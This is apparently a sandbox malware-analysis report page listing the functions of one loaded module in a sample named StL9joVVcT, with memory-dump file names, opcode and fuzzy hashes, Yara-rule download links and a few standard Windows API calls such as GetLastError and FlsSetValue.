                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 33bee9af1ebea8803759f08dd6119f6397ada8a97a0b921e5d4e7fd99678fc82
                                                                                                                                                                                                                  • Instruction ID: 6cc727329749f5a4dbe6d513ab77c3eaaeecff1b7b26662c92400dc601f7671c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33bee9af1ebea8803759f08dd6119f6397ada8a97a0b921e5d4e7fd99678fc82
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DB17232B5964289FB34DFF590A12BD27A2BF0A798B548179DE0E57B89DF78E405C300
                                                                                                                                                                                                                  Function 00007FFD9441B760 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0c40c657e73218cf44f95007ee1a6f25d79defce4d1dc1b5231c420b0d6059bf
                                                                                                                                                                                                                  • Instruction ID: 8b36c4fcd759b25340cca51114365aa722faa6ba0953bcf109929d343ea4b132
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c40c657e73218cf44f95007ee1a6f25d79defce4d1dc1b5231c420b0d6059bf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48B1AE32B08B8685EB60CFA1E4A47AA73A4FB5EB84F048032DA4D4775ADF7CE441C740
                                                                                                                                                                                                                  Function 00007FFD943DD7F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                                                  • Instruction ID: b18da013f3a6e833e50e96ef746a3d32673f0abe11a9eff033fa95708a8c0787
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3B1C232B6878286E7B0AAA1D1A477977A1FF46794F00D239DB4D03A86DF7DE490C700
                                                                                                                                                                                                                  Function 00007FFD943B70B0 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: daa356566c31e4c1d7e91144bb499f27ec7dfa7a95d58268b36357342de93443
                                                                                                                                                                                                                  • Instruction ID: 975a7bbffb25217f1a8c1860051de76c704d5b2a6aeb7e1dcde686e248291728
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daa356566c31e4c1d7e91144bb499f27ec7dfa7a95d58268b36357342de93443
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEB1B222B4C64281EAB4AAA5D0E13BE23A1FF46B84F14C139DE9D17797DF3DE485C250
                                                                                                                                                                                                                  Function 00007FFD9446B6B0 Relevance: .2, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                                                                                  • Instruction ID: 4d6c66bc99b25c3c86b0a5fbd434367317ae9e2d767e7fbaf2dc1869397bca29
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA919022B28B9587DB58CF3C815427C77A0F799B44F44A238DB5E83B46EB78E684C700
                                                                                                                                                                                                                  Function 00007FFD94414CE0 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 5cb03cd8afd86521e0afb295dadb9efb26f0f399186a79f5d79d7d4639026a5d
                                                                                                                                                                                                                  • Instruction ID: c5cac23c6553de34412c90fddc5159f6c653b4ab8ca643eeaa3dce9f4680cd83
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cb03cd8afd86521e0afb295dadb9efb26f0f399186a79f5d79d7d4639026a5d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9481C572B0878286E734AFA1E5A47792791FB9BB84F059031DA4A47B8ADF7CE401C740
                                                                                                                                                                                                                  Function 00007FFD9441C650 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                                                                                  • Instruction ID: 39882f74f7740859c2b8d79283ecb934577f2fa3bfd0acbedc13065e82cfb56e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F81E222B49A8285EB748A65D9F073967A1FBAEBC4F08D035CE4D0375ADFB8D841C740
                                                                                                                                                                                                                  Function 00007FFD944243D0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: aa821b9dd0a51dc4c0b2dec16ace554500e5714ebed2369b8a61626328a49fd8
                                                                                                                                                                                                                  • Instruction ID: 3b98a26a5dd0a1e3a322314a4aadfdbdd396f6bf1b2bef3af34df99784427772
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa821b9dd0a51dc4c0b2dec16ace554500e5714ebed2369b8a61626328a49fd8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB7116B2B15B5A82EA798BC6A8A067977A1FB86BC1F40C031DE8D47749CF7CE541C740
                                                                                                                                                                                                                  Function 00007FFD943DA530 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6c33824b5e95a59c1c160466e4c4e8e239db09b6634da41c54f7ff6e6eed5a35
                                                                                                                                                                                                                  • Instruction ID: 6f769f321d3bdba1ca5b381196ba8c40c4c4e02d91ee89e62799d74f44121330
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c33824b5e95a59c1c160466e4c4e8e239db09b6634da41c54f7ff6e6eed5a35
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A8122B3B146818AD721EF75D1A06ADBBA0FB49B80F08C636DB4E43681DF39D595CB00
                                                                                                                                                                                                                  Function 00007FFD944E9490 Relevance: .2, Instructions: 184COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                                                                                  • Instruction ID: ac17a16dfecf92791caea9eb1c9bb1c40be8b140b5954df47262a4acf8ae59f4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8061D172B18661C6DB308F55D09067F7BA1F78AB84F159132EA4E0778AEABDE541CB00
                                                                                                                                                                                                                  Function 00007FFD943F4130 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 293130890c0899cc1c1809cabd1bf6034c3bd0520d8c1494083495c66551e38a
                                                                                                                                                                                                                  • Instruction ID: 27fe9af0c553acbaf050aa72c385d83f6d423398b0da3bf05eb05fbd6c6beb02
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 293130890c0899cc1c1809cabd1bf6034c3bd0520d8c1494083495c66551e38a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F161DE32B4865196FA74EEB6A0A00BA67A1FF76BC4B49C036DE4C0764ADF3CE041C300
                                                                                                                                                                                                                  Function 00007FFD944200D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 193b2b7267275911545157cc55b833e17e3593e4b2a6945a561a015643d3f4d5
                                                                                                                                                                                                                  • Instruction ID: 5b6875b783bf149ee36727f425fb01c85493d92ab6fbe1bf21f7f6a854932b01
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 193b2b7267275911545157cc55b833e17e3593e4b2a6945a561a015643d3f4d5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51F272B14B4586DB21CFB5D0A02A9B7A0FB96784F50A323DB4D63756DF78E4A1C700
                                                                                                                                                                                                                  Function 00007FFD9442C380 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 43cee2cadc116fe26df870a37d5be353b2a15b4d1b3a6f279a79b3fcc68079dc
                                                                                                                                                                                                                  • Instruction ID: e5fbcdb58ed14d48b04304edf0632328842b49af18b14e396a3219719069dd25
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43cee2cadc116fe26df870a37d5be353b2a15b4d1b3a6f279a79b3fcc68079dc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE2105C670AAD44ADF42C7E988A23B57F91D76778CF58E066C58C06F8BC55DD00AD310
                                                                                                                                                                                                                  Function 00007FFD9450B444 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 570795689-0
                                                                                                                                                                                                                  • Opcode ID: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                                                  • Instruction ID: 2c07af48568342d89f40ebe3a19d6d56804cde171b5af94a1f9e2bbb2d122de7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aeb96a2494a04752b5dc3f15f4d6223bcbf2d088cd50240a63637ce0e1d52570
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81410D18B0924242FAFA67E155F257953928F477A0F14C775EA7D0A6EFEE2CF941C200
                                                                                                                                                                                                                  Function 00007FFD9450B5BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FFD94509ED1,?,?,?,?,00007FFD94504CC7), ref: 00007FFD9450B5CB
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,00007FFD94509ED1,?,?,?,?,00007FFD94504CC7), ref: 00007FFD9450B601
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,00007FFD94509ED1,?,?,?,?,00007FFD94504CC7), ref: 00007FFD9450B62E
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,00007FFD94509ED1,?,?,?,?,00007FFD94504CC7), ref: 00007FFD9450B63F
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,00007FFD94509ED1,?,?,?,?,00007FFD94504CC7), ref: 00007FFD9450B650
